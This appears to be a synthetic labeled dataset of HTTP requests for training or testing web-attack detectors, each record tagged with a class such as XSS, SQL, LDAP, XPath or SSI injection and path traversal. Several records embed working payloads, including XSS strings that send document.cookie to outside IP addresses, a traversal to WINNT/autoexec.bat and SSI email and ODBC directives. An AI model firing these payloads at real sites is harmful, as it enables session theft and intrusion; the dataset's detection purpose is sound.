If-Modified-Since: Thu, 15 Nov 07 10:00:42 UTC
If-Unmodified-Since: Mon, 19 Dec 05 02:06:08 GMT
If-Match: "TNqQMRopKqO_0akyLY"
If-None-Match: *
If-Range: *
Max-Forwards: 4391
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: Nmto snLh=d7kiptxe
Range: 65399-30
Referer: http://www.8dmos.uk/n7n4xqf/aiuaofl/etnaes/ogmo/n3nlda2o.nsf
TE: chunked;q=0.4
Trailer: Pragma
User-Agent: 2nmhranRnn (hzkxkHe; zkp0PsNd9Y; e6pVMGMJ6; aLmT9Ruh; eXJ5P16Js)
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: 9.9 134.21.37.89, 7nr/4.1 www.aWsu5Ryu.jpeg, FTP/0.4 www.estts.png
Transfer-Encoding: identity
Upgrade: 4il/3.9, tonrt/7.0, dpxy/9.7, 9er/8.7
Warning: 492 17.108.254.89 "nam6dyTtRno" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38809
Start - Id: 47232
class: XSS
GET /g2C5AIw/i9Y67/itiDl/f8gY-sTgq@e5.jpg?tel3Iwuc=792&hcuee=gceEtiv&catS=nile&sock_stream.VqRazoNR=17906&9Q0CZi=716864616&d40gseho=82&Nv=o4nyn%7Ewget&hmazrmnroite3a=systemwinntlinkr&treplaceVvfe72form=hiR2&clstrwh=04&ttsodroeuteff=4298&l2tiov9ae9nWtv=%3Clink++rel+++%3D%22++stylesheet++++++%22+href+%3D+%22+++++javascript%3A%5Bwindow.open%28%27http%3A%2F%2F126.21.32.6%2Fnsorre.jsp%27%2Bdocument.cookie%29%3B%5D+++%22+%3E HTTP/1.0
Host: 144.84.23.39
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew, x-mac-japanese;q=0.4, iso-8859-3, windows-1258, x-mac-arabic;q=0.1
Accept-Encoding: 
Accept-Language: pnOooeo-we;q=0.1, 4de-nit
Cache-Control: max-stale=443
Client-ip: 226.163.167.76
Cookie: dobdiuhuham=11eacxxp4;eA5io=oUypbGUQqJ5;ipnTag3s0=sjcY;WNdtZ=r_awIqSuH8-;1jaopLsvWsEsG=%ha1ibgsound:6t$S;0zm0=ee5 ]&/t?EwA$ ty0
Cookie2: $Version="633"
Date: Sat, 28 Mar 09 02:11:54 UTC
ETag: "uBrX2tCovUdEGKdgZkT"
Expect: 100-continue
From: oreAv@osmi3u.be
If-Modified-Since: Sun, 11 Mar 07 12:02:40 GMT
If-Unmodified-Since: Thu, 22 Jan 04 14:05:14 UTC
If-Match: "LtcuKYm7fV9WbEX7Rj"
If-None-Match: "XauefaVJ.oiBrGwdw8"
If-Range: Thu, 01 Apr 10 23:20:28 GMT
Max-Forwards: 878
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest response="53819Da8f4aCf6baeFB99dfFAfDaDCBc"
Authorization: nhwoDd De9cs=naEoj
Range: 642-53334
Referer: http://www.dlceoe9I.it/efee/sixb/9nejtu.txt
TE: chunked,chunked;q=0.7
Trailer: Proxy-Authorization
User-Agent: t4wss/0.6
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7301x0518
Via: 2.7 www.a5oM5.png, 3.0 www.SOoisn.jpg, eoirw/9.2 132.221.91.26:8
Transfer-Encoding: deflate
Upgrade: unbL/8.1, luoi/0.0, jgsmeh/0.8
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 230.35.184.69
X-Serial-Number: 736758197053618
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47232
Start - Id: 38194
class: LdapInjection
GET /ap/tecVKcIud2sZLCVx5R.png?Rei=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&BXxD3FPUa=57202&fc9vbwaw=30408 HTTP/1.0
Host: 32.220.183.245
Connection: jdxn
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: gz-U8aa0e, clsstr-SlrnbYY, u0n-f;q=0.0, eheOjU-t;q=0.3
Cache-Control: no-store
Client-ip: 9.211.101.123
Cookie: kNprocessing-instructiontmpwtDbP=Ui n4
Cookie2: $Version="97"
Date: Thu, 24 Sep 09 14:28:41 GMT
ETag: W/"h8N@m2DAd.B8ytb2d"
Expect: anoae=Rywdsuv
From: hnrpa@Dtsdlni.be
If-Modified-Since: Tue, 25 Jan 05 14:43:53 CET
If-Unmodified-Since: Fri, 05 Sep 08 12:11:23 GMT
If-Match: *
If-None-Match: "1h39WETND68lAI6D"
If-Range: Mon, 15 Nov 04 24:15:44 UTC
Max-Forwards: 3818
MIME-Version: 9.1
Pragma: at='ca'
Proxy-Authorization: Digest nonce
Authorization: Basic bWF1c0U6TWJFb2I=
Range: -49,281-
Referer: /ur0bnme/tl3iI/efqetjys/eeen.js
TE: deflate;q=0.0,trailers,deflate;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/7.8 (Windows; U; Win98 4.9; Hn-za; rv:5.1.4) Gecko/27697955
UA-CPU: StrongARM
UA-Disp: 843,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5505x7135
Via: HTTP/0.9 115.157.193.152, 9.6 40.50.173.120
Transfer-Encoding: ndeA
Upgrade: aec/9.2, nnrn/6.5, ldi/7.0, 7et/3.4, auo/7.2
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 092315765
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38194
Start - Id: 49425
class: XPathInjection
GET /snishdfsD8oheeghs7.mspx?eeeaeoesblsfty=3yRUo2JtNM&rm=ernE%27+++++or+6++++%3C+++++count%28path%2Fchild%3A%3A*%29++or+++%27sorS6%27+%3D+%27&nenaEe4e=nJirq8m&yoptselectVUwGopt_O=fGBmN HTTP/1.0
Host: 95.243.19.182
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp;q=0.9, x-mac-korean, cp-932;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: eC5-mi;q=0.9, r-ertsOeS6;q=0.9, otA-yn, hooai-lnaae;q=0.7, 6o-etp;q=0.3
Cache-Control: only-if-cached
Client-ip: 93.18.190.156
Cookie: tTovacnc2iv3i=j5U.UB;mwarevu=58;atcnndohsehuh=3338;nh1letvsebre5s=nhun
Cookie2: $Version="722"
Date: Mon, 13 Apr 09 18:13:18 UTC
ETag: "9EJy05E0HvEXhGvYe"
Expect: 8Usetdir
From: lyE3Znu@romta.biz
If-Modified-Since: Sat, 25 Jul 09 09:05:12 UTC
If-Unmodified-Since: Sat, 25 Oct 08 01:35:51 CET
If-Match: "KcPEIEblBQ-CmKz_cXNo"
If-None-Match: "DH14wSY@1m_Vmjij6"
If-Range: Sat, 13 Feb 10 22:24:05 UTC
Max-Forwards: 596
MIME-Version: 0.6
Pragma: 8OcST='hE'
Proxy-Authorization: Digest nonce
Authorization: Basic dGV0aTpzVHJj
Range: -32,-92418
Referer: http://www.ewh3H.be/aaeCerae/ltno/htoyi/nosL5.js
TE: chunked;q=0.9,deflate;q=0.6,trailers
Trailer: Warning
User-Agent: awreapass3ucpely
UA-CPU: StrongARM
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5208x110
Via: 3.5 www.f9dr1gse.js
Transfer-Encoding: lmeo3a; allejh=en06Ntn
Upgrade: 7wfie/1.9, qn3h0/6.3, fiEx/5.9, lho/6.1
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49425
Start - Id: 45644
class: PathTransversal
GET /nsmOT0i7n/ltr/ade@QIR9MihxGpwL/74/tTammefi37ti0taXv7ge/oa2IFMRVedt2rX4DRk/BU4aXyO.cfm?ritHywtayi=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&lken=%27ke%25tsj0nershutdownusn&ncq=4732037086&Vjinput7I1uS=27&2wItCmo0ssnohBp=4793&hhTad2cy=227286&locationn0W8oHvUZ=uat7w&qtorhytgot=-pi&gnd=%5B+%3Ast&mE=afPaxp_%3Aii&qZbwc5a=1292114 HTTP/1.1
Host: www.nimhpYphht.biz
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Crm-aHi5dlEi;q=0.2, hx-ehOe;q=0.5
Cache-Control: min-fresh=2800
Client-ip: 168.189.41.184
Cookie: E_Z@M3OXol=3343;hrl1erunlpryl=3t1digyutetetonen;JRJimgbChS=25504;3soivleeawlioo=veoEw
Cookie2: $Version="85"
Date: Tue, 27 Jun 06 05:12:13 UTC
ETag: W/"a7BEiQfYTaCL7@ec4s"
Expect: 8tgi=set7eote;8iscgtm
From: f6eo@ixbm.net
If-Modified-Since: Wed, 14 Jun 06 17:32:50 CET
If-Unmodified-Since: Tue, 16 Jan 07 12:48:28 GMT
If-Match: "640EYh5ENA7PUMw2St"
If-None-Match: *
If-Range: Tue, 19 Apr 05 05:47:41 UTC
Max-Forwards: 3899
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest nc=9A40A377
Authorization: Digest realm
Range: -5753
Referer: http://yrt5exr.it/mn5n/becSn/nehhsar/oouesh.js
TE: trailers,gzip
Trailer: Upgrade
User-Agent: i9e74/7.5
UA-CPU: PowerPC
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: HTTP/4.1 www.lutK.gif, HTTP/9.1 www.1scahsr.htm
Transfer-Encoding: npem; 4tirq1=vykbdsk
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 06916624416641934220
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45644
Start - Id: 48204
class: XSS
POST /cakch6dgwluGwhsks/hnnp5oea/1wLwuj8bgsoundnt/ird5hEiEpWkL2@eTKVnS/cfg6qzP/o-1aS6S4zJnm2/GMQ9kuzw1/EpositionovP/yB5Kwp6VcVEgFm6yNS/dGdV2/6x_0BrmBQN16zvR.pl? HTTP/1.0
Content-Length: 222
Content-Language: df0jit
Content-Encoding: identity
Content-Location: http://Tiidvmes.gov/8tsisH/xiteMd/ns2ssnc.tiff
Content-MD5: d3NoemFFcEFpYUF2ZGVhcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 25 Aug 09 21:56:41 CET
Last-Modified: Mon, 29 Nov 04 23:21:51 UTC
Host: 80.192.14.11
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: <img  src    =    "     javascript:[window.open('http://116.121.11.89/asic.mspx'+document.cookie);]     "    >
Cache-Control: no-cache
Client-ip: 198.54.180.201
Cookie: eHQaoEhsodssb=6649245;zA=31-1iCZ
Cookie2: $Version="10"
Date: Sat, 23 Aug 08 01:27:16 UTC
ETag: W/"aPRfRV_C0jl85cnU9J@1"
Expect: 100-continue
From: nio6@slo8Cr.fr
If-Modified-Since: Sat, 08 Apr 06 16:50:50 UTC
If-Unmodified-Since: Thu, 15 Jun 06 03:10:57 GMT
If-Match: "Q.cuy-u.-irWf.YI7fB"
If-None-Match: "kEDcfSGTrOO11J.Mfy5A"
If-Range: Wed, 14 Apr 04 17:27:27 GMT
Max-Forwards: 5
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest username="moie1"
Authorization: NTLM aWRlZW5lY3BycGJyZXJyc2hrVVNFaWk4cnNtaWFrM2x0MXc0c0Q=
Range: 86-
Referer: /c2nwdonL.bin
TE: trailers,trailers,chunked;q=0.5
Trailer: If-Range
User-Agent: otussuut/3.7.7.5
UA-CPU: PowerPC
UA-Disp: 9694,0941,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0833x5233
Via: HTTP/5.2 www.hrln.htm, eoaeeL/2.0 2.108.47.254
Transfer-Encoding: identity
Upgrade: nw3/1.2, Eccue/9.3, dnaeM/4.7, yeug/4.3
Warning: 376 www.tr4on.jpeg "m7aaREuTTovptbolar" 
X-Forwarded-For: 251.96.98.120
X-Serial-Number: 340888141293
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

p9IrzYep5=u]s &zjfjrPGa=wahoSeOc4B&EliE1d5Drdewno=5tepnet2e:~mL&wn=Tsowherew&eptjc4ncE2oouf=6153&itEtiSumuskt0r=aGVh9KT&d92T0rjalfn= tade64aehb&auetf=gnnmTegetTnltAIh&ItTgsielizien=3017522&dh2lzeonpyf=dzrhixfieqamydf

End - Id: 48204
Start - Id: 39434
class: SSI
GET /pdte3ori9ewvrxsvidt/uxzm/ayaAesaetAzdlonnje/cXo_R0mO_vJ9kK__cA_/e6q/oethhtqd6iidmztmo/s9deaoroa/aZv1c4ceRyThUS1ndU/ard3fhaiu3esrgapsI.tiff?nho8hoaruyn=yLPc8wib2xEC&nntrbrlaice3hu8=%3C%21--%23email+fromhost%3D%22www.h5meev.com%22+tohost%3D%22mailbox.iESD.com%22+message%3D%22tjrauc+tiafs9y+oistwn+Gihba%22+fromaddress%3D%22sbIe.com%22+toaddress%3D%22Umat3.daaeay.com%22+subject%3D%22jr%22+sender%3D%225Aug.com%22+replyto%3D%22Eob3aos.com%22+cc%3D%22smL%22+inreplyto%3D%22tFhnl+e5du+8eefn%22+id%3D%227email%22+--%3E&oiae=314794&txuoa7t=arAtrncsenono1t HTTP/1.1
Host: www.rhtase.cz:80
Connection: keep-alive
Accept: video/quicktime, image/*;q=0.1, video/mpeg;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: ztaryil-gt7, weeE-d
Cache-Control: only-if-cached
Client-ip: 166.48.94.150
Cookie: qt=c5au|H;zo9eprReh9uc=p7N-7-;iGibanl=game ;du6ruyr=o udocumentcesydabh;vBQlDr_XG=aF@nTJ7
Cookie2: $Version="308"
Date: Thu, 20 Jan 05 18:35:29 GMT
ETag: "-A3q_0z5h0Y@AJr8"
Expect: 100-continue
From: hziane@Cydgndnsy.org
If-Modified-Since: Thu, 06 Dec 07 10:11:44 CET
If-Unmodified-Since: Sun, 20 Nov 05 16:43:22 UTC
If-Match: "o5j26.LaMUfb9Pnf-Yz"
If-None-Match: "B1F2-8jSm9IP8.gHa"
If-Range: Tue, 27 Mar 07 04:14:38 UTC
Max-Forwards: 0221
MIME-Version: 3.5
Pragma: ht=hOmppd
Proxy-Authorization: rashN riiam=cssstki
Authorization: NTLM ZlNuZWUxaGE4cnJuaHBlQXJsZWVpb3RvZlVpNXFlY0VpaWFwbmU=
Range: -07524
Referer: http://hisF7xcD.com/azhei65e/ttbfErh/SK4cyiit/osrdps5/et9gf3.php4
TE: trailers,deflate,chunked
Trailer: Authorization
User-Agent: Mozilla/7.6 (Machintosh; U; PPC Mac OS X 5.8; Pe-ra; rv:3.1.3) Gecko/16147579
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 162x589
Via: FTP/9.1 www.4ykolude.tiff, 5.4 232.23.58.68, 9.0 www.Betip.shtml
Transfer-Encoding: compress
Upgrade: r94e/0.1, hme/5.5, ammrcS/1.0, aznO/2.8
Warning: 280 113.181.5.189:613 "neo5iip" "Wed, 20 Feb 08 05:16:28 CET"
X-Serial-Number: 7022355683967600
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39434
Start - Id: 35524
class: XPathInjection
POST /Nrner25dph1ehAolaev/window.openGsZ6swhere/t3ORav_B7XqjFCv/SuMeaar4or4yyra/1tilpooehdozidbetrm.asmx? HTTP/1.0
Content-Length: 345
Content-Language: geoltbre
Content-Encoding: gzip
Content-Location: http://www.htbemq.st/aWia2/yiwttrlS/lgaza.zip
Content-MD5: dGVwcGxtbmV2ZXJ1Y3JlSA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Jun 04 20:40:13 GMT
Last-Modified: Tue, 20 Apr 04 01:58:03 CET
Host: www.yochoana.cz
Connection: keep-alive
Accept: image/gif
Accept-Charset: x-mac-roman;q=0.8, iso-8859-9, koi8;q=0.8, x-mac-korean;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=496
Client-ip: 25.251.158.41
Cookie: LUboot.iniaOEVy=24472;168sqtrrtolps=erR
Cookie2: $Version="982"
Date: Sun, 25 Jul 04 04:29:47 GMT
ETag: "pjVM2@qz7S7-tpwC"
Expect: Zgse=teneo;otninw=mnsa
From: ddsory@ail3hIue.st
If-Modified-Since: Sun, 04 Dec 05 22:35:26 UTC
If-Unmodified-Since: Sat, 12 May 07 16:49:45 CET
If-Match: "65vsifuT2uKvnZ-iUT"
If-None-Match: "KEvsj_Yu0hTdM9t"
If-Range: "YvNJPF5qA1zy5Q@z"
Max-Forwards: 80
MIME-Version: 2.0
Pragma: no-cache
Authorization: NTLM dDZ0aGV0c2w3c2toZThlZWVvd3RmNnRpTWVuYU5hYXJpc25oVDVOYXN0cg==
Referer: http://www.ESeedth.gov/pi9e/8s9oieaS.swf
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/9.2 (X11; U; SunOS sun4u 3.1; em-ar; rv:7.7.4) Gecko/90980648
UA-Disp: 740,794,8
Via: HTTP/2.0 40.243.44.154, 6.4 www.tnxyl.shtml
Transfer-Encoding: identity
Upgrade: hs1gw/0.3, rdt/3.0
X-Forwarded-For: 182.111.185.137
----: ---------------------------------

easq=35156668&achqikhf=nts/svpt/I/child::node()[position()=5]    or  '0lyt'=  '&buoah=7&2IECtmp8=himkn2vts7trmehi&autoexecrLb5=eApa6Moz8&tTl8ua=uK5RtgwyreeeH&3TuzNA=148&jkehmdeecnnh=pYX4x&aa5ohlfnuiznpo= eodocumentatmochae2N&nDwRwKb-Xv=rspstiha&vurneeQzyPnas=sFKl&Up2dKlwinntprocessing-instruction_2=yeF)5foyejd

End - Id: 35524
Start - Id: 49422
class: XPathInjection
GET /h2w_qnetcatiK/l9TwLTexecgValllibIApositionV/rmFIrVycEgDzP.shtml?mde1srsEcoee=57124&eicbeaUgoti=s89&ie=6102307304&oarbmanst=33575635&TDoVRM=4l+esytea&SItsedhbEmr11u=%28i+++%3C++count%28Dusko%2Fchild%3A%3Atext%28%29%29++and++++j+%3C++++count%28i3pe%2Fchild%3A%3Acomment%28%29%29+++and+k++%3C++count%28nloei%2Fchild%3A%3A*%29++++%29&EcZcJYlibhXINu=xp_&8S=6&sRU47esststaefl=gjO%40&pRh=e HTTP/1.0
Host: 84.134.204.211
Connection: eeacsoi
Accept: image/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: p4-n, senia-Oehl;q=0.9, e-heeiq, lal-an, Oed-tv9rootn;q=0.6
Cache-Control: only-if-cached
Client-ip: 93.18.190.156
Cookie: in692knqgY-S=nAt4jh3l;7elr4Afyjedabt=\h:Hnna|)56@stits]iu;tceao=$ewoeeehe whereEcmaildC;tqoh4srbl=am
Cookie2: $Version="37"
Date: Fri, 26 Sep 08 20:57:29 CET
ETag: "9EJy05E0HvEXhGvYe"
Expect: nrctrot
From: 2etopwi@exrhsnpxt.org
If-Modified-Since: Sat, 25 Jul 09 09:05:12 UTC
If-Unmodified-Since: Sat, 25 Oct 08 01:35:51 CET
If-Match: *
If-None-Match: "DH14wSY@1m_Vmjij6"
If-Range: "Mu-7L2kBKqVbrZs"
Max-Forwards: 2838
MIME-Version: 0.6
Pragma: 8OcST='hE'
Proxy-Authorization: Digest nonce
Authorization: Digest qop=ott0rsk
Range: -32,-92418
Referer: /peee/mabcpt/ocSo5wn/dssCe.php4
TE: chunked;q=0.9,deflate;q=0.6,trailers
Trailer: Warning
User-Agent: eoOtae7sI3 (e2_O-C96; rtjxcoJe)
UA-CPU: StrongARM
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 7.1 39.24.246.122
Transfer-Encoding: identity
Upgrade: 7wfie/1.9, qn3h0/6.3, fiEx/5.9, lho/6.1
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49422
Start - Id: 41183
class: SqlInjection
GET /hYr4Q/dIhnodeL/laeatsssrahnf/hv/-Md2Mb9xLt/LM.php3?saeaUx=seeq&REto=c7JE&subIs=u5av&aaN=adgnxtiTntxA&neatIs=into+%3AXtgt%3E HTTP/1.0
Host: www.ycatwsf.uk
Connection: 7u0ehoeo
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: 52276    or  id>9   or ls_id<20
Cache-Control: no-store
Client-ip: 43.103.141.110
Cookie: tet7axss=152;rdfc=361;las=haeo;sne=yehiaceaw
Cookie2: $Version="4"
Date: Sat, 28 Aug 04 15:53:19 GMT
ETag: "Ub928eM_Vw_6r6WY-jO"
Expect: tywew9ot=neizle3v;cttrefw
From: sntU@ntas0.biz
If-Modified-Since: Sun, 25 Jan 04 09:39:37 GMT
If-Unmodified-Since: Mon, 09 Mar 09 08:09:32 GMT
If-Match: "se7j-Lnz7ds1Kv6f"
If-None-Match: "AQ8vdZxEplMaIteD2W5"
If-Range: Sun, 31 Jul 05 17:29:38 GMT
Max-Forwards: 32
MIME-Version: 2.7
Pragma: tt5mln='dtowsd'
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: NTLM NjF0Z3NpZlZoRGZuc2hSa211b3JxbnJpYXJpZWFkaXJyYW9hbG8=
Range: 5154-283,-781,-71
Referer: /hlomw0s/Etear/ogua/erheps.gz
TE: gzip,chunked,gzip;q=0.8
Trailer: Date
User-Agent: Mozilla/5.9 (Windows; U; Windows NT 2.0; tm-ra; rv:6.8.7) Gecko/19025508
UA-CPU: PowerPC
UA-Disp: 8221,0714,8
UA-Color: color32
UA-Pixels: 724x926
Via: fege/6.3 16.254.76.41
Transfer-Encoding: compress
Upgrade: xeeyd/6.4
Warning: 227 www.Stshs.jpg:5 "e3joeviwaEa" "Wed, 09 Aug 06 10:55:01 CET"
X-Forwarded-For: 112.176.54.6
X-Serial-Number: 800944
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 41183
Start - Id: 46658
class: XSS
GET /o7emi/3zcLpinput@g7C9KS/f53Bzuto7hOb/PEC_dlcK7@/rio0bsgnD.nsf?iys6aAiio=%25iwp-e3&rhtohoi3=8i&aoee1tlnaeel=936&ne=m2er1DoypeY&eva=75&NrnnweMteaeh=850&nEenfeIo9hylee=4srie8&5shaze=9f3r0teoe4tdo&lnhrt=054806461&tihgraauyfb=870805808&aq60J8eHte=euvg&55llelqr=xrnqBsNm&NHScrhnrauDeoeu=ooY&olta=fxvooahnisr5p HTTP/1.1
Host: www.3fane.st
Connection: close
Accept: image/gif;q=0.5, application/postscript;q=0.0
Accept-Charset: macintosh;q=0.4
Accept-Encoding: identity, compress;q=0.9, identity, compress;q=0.7
Accept-Language: aldej-2nii2;q=0.8
Cache-Control: no-store
Client-ip: 8.25.60.100
Cookie: sb7r9dtel=5bgsoundtl0igsifs -eoo;KTXlink=<div     style  ="  width:   expression([window.open('http://78.171.90.139/ries.exe'+document.cookie);]);    ">;ebtlslcsqp1y=ityboOqltza
Cookie2: $Version="09"
Date: Thu, 06 Sep 07 08:55:09 UTC
ETag: W/"UZZb2JZhOTt71FjvfCKp"
Expect: ebrmdn=eOsneu;lnwdu
From: iam9mt@lo1hek.gov
If-Modified-Since: Sat, 04 Nov 06 11:12:50 UTC
If-Unmodified-Since: Sat, 02 Dec 06 05:27:40 GMT
If-Match: "4ox-75plwBFcoou"
If-None-Match: "cNaMXmbMfNLiArZ4"
If-Range: "y_O0QomWdoPDkVlRS-"
Max-Forwards: 739
MIME-Version: 0.5
Pragma: AFeqt=3hse
Proxy-Authorization: NTLM eTVpdDM2dHdnbnN6ZWRzZWQ5Y29lbGpFcmVzdHRvd28=
Authorization: Basic Z21waWlpdjpub3JrdA==
Range: 80-
Referer: /yHho2n/glzY/5nlnn/ldii/NqraaifG.pl
TE: deflate;q=0.8
Trailer: Accept-Encoding
User-Agent: Mozilla/5.0 (Machintosh; U; PPC 7.9; cf-wh; rv:7.8.9) Gecko/85351343
UA-OS: WinNT
UA-Color: color8
Via: 4.2 www.aInt.jpg
Transfer-Encoding: compress
Upgrade: pesis/7.5, lqrttT/4.6, bTsote/3.0, cstc/2.2, peotn/4.0
Warning: 466 152.152.48.226 "ecjo" 
X-Serial-Number: 64753281
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46658
Start - Id: 37856
class: LdapInjection
GET /p96jsl7blhsLso/aa/peo9tseldtht/jnZZChLll/edndneocileAniNsnr.html?Lu=yAaeentmshMl&a2uhmrMoEhrM=4%3Ct%5Chiiincludehome+m%7Eeu%3Fe3&thmeilPnka52nj=5508&an3e0p=j9vIZY8cF3a&yo3estoie=og2kPfshd56&3Fj2=360868&@passwdZinsertshBY=26rydghr&gnyllwrlsp=daai5ufu+&4nEiwrv=0346523810&oj0n=s7mDb.X5yWgS&s3lgE=%3F&ve4hlmeaoa=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&sw=passthruwzd0&ighlnOlgaGae=383 HTTP/1.1
Host: www.wizsMnr.com
Connection: mlentm
Accept: text/*;q=0.4, audio/x-wav
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 177.246.9.242
Cookie: thusritt=objectilicaetc+h;7sp=48
Cookie2: $Version="737"
Date: Fri, 06 Mar 09 02:57:46 CET
ETag: "QM2AbarDrp.Gbbqs7pd"
Expect: ealdo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sat, 10 Nov 07 05:10:32 CET
If-Unmodified-Since: Sat, 08 Sep 07 23:54:50 UTC
If-Match: *
If-None-Match: *
If-Range: "g.eXlvzwong6b-P_NM"
Max-Forwards: 1
MIME-Version: 7.8
Pragma: jk='0Nnst'
Proxy-Authorization: Digest username="otjbsa"
Authorization: Basic YW9odzpsb3Vi
Range: 853418-,-430
Referer: /tMeEs5y.jsp
TE: trailers
Trailer: Referer
User-Agent: Mozilla/9.0 (compatible; MSIE 6.8; Win98; oaatfwgs; em2s69adt)
UA-CPU: x86
UA-Disp: 8628,0806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 649x451
Via: FTP/8.5 www.tififilr.shtml
Transfer-Encoding: deflate
Upgrade: uoE/5.1, iitjl/6.0
Warning: 340 www.t8Tb0.gif "i52D9owoehei2ibsei" "Thu, 30 Dec 04 01:19:45 CET"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37856
Start - Id: 40805
class: SSI
GET /sdenegfrdii/vwped/B2GpI4VGw0/ssujreaeito/ncbk5gCqDfohgzpjZB/k7YDH7m@qincluderxx/Sbp_Pt.UOAILXA/s4nxwusephnn87GclssA/HacceptzXOwinnt/pap8O2oit/yEhHhGj.wi9hjgd8P.cgi?iLsprjehyt5Toj=3712&exerdp=5916&va2ftfcs=oM5oOIWcZ&asl1Y9r6sb3=13128&p9=c9hso5&ic5caTerRecrD=589526&3frbnatE=lsi9t0toixtjex&kPfeladiE=%3C%21--++++%23odbc++connect%3D%2219ie%2Ccinzu%2C23heD%22+++++++++statement%3D%22select++++*+++from++yh%22--%3E&ALi=9 HTTP/1.1
Host: www.iwo1t7f.st
Connection: iamUPE
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: max-stale=8
Client-ip: 255.59.165.34
Cookie: Touurhayfb=n@mVjBvGxBft;shb=:daeruojeunion](osam5
Cookie2: $Version="313"
Date: Sun, 17 Sep 06 22:20:14 GMT
ETag: "RvbSK2h6WYj87MpwHja"
Expect: snetell=1iri3waa
From: iiljwdi@httr81j.de
If-Modified-Since: Thu, 04 Jun 09 06:55:00 UTC
If-Unmodified-Since: Fri, 27 Jan 06 24:12:08 UTC
If-Match: "SnWfAvpwjBHRiWG"
If-None-Match: *
If-Range: *
Max-Forwards: 45
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM cG5oSmFzbnMyYWM1bHNjbm9tU3NnbG5iYTB0emRoT29wd25sdWhuZmVobQ==
Authorization: tdrm rbhoee=aaoth
Range: 89010-,593978-8589,-17027
Referer: http://agipI.be/wlzeee/Rsn9d/sirauDe/fTwh0F.conf
TE: trailers,trailers,gzip
Trailer: Range
User-Agent: Mozilla/0.6 (X11; U; Open BSD i586 9.1; si-ux; rv:4.8.5) Gecko/46807947
UA-CPU: 68000
UA-Disp: 327,318,8
UA-OS: Win98
UA-Pixels: 871x928
Via: 3.1 163.229.123.125:39629, 9.3 188.171.226.164, FTP/0.3 www.ds4e9ag.shtml
Transfer-Encoding: compress
Upgrade: adlr/3.8, ehsO/1.6, anah/5.9, zlni/3.4
Warning: 985 www.atEa.jpg:824 "esoj" "Tue, 11 Nov 08 09:01:56 UTC"
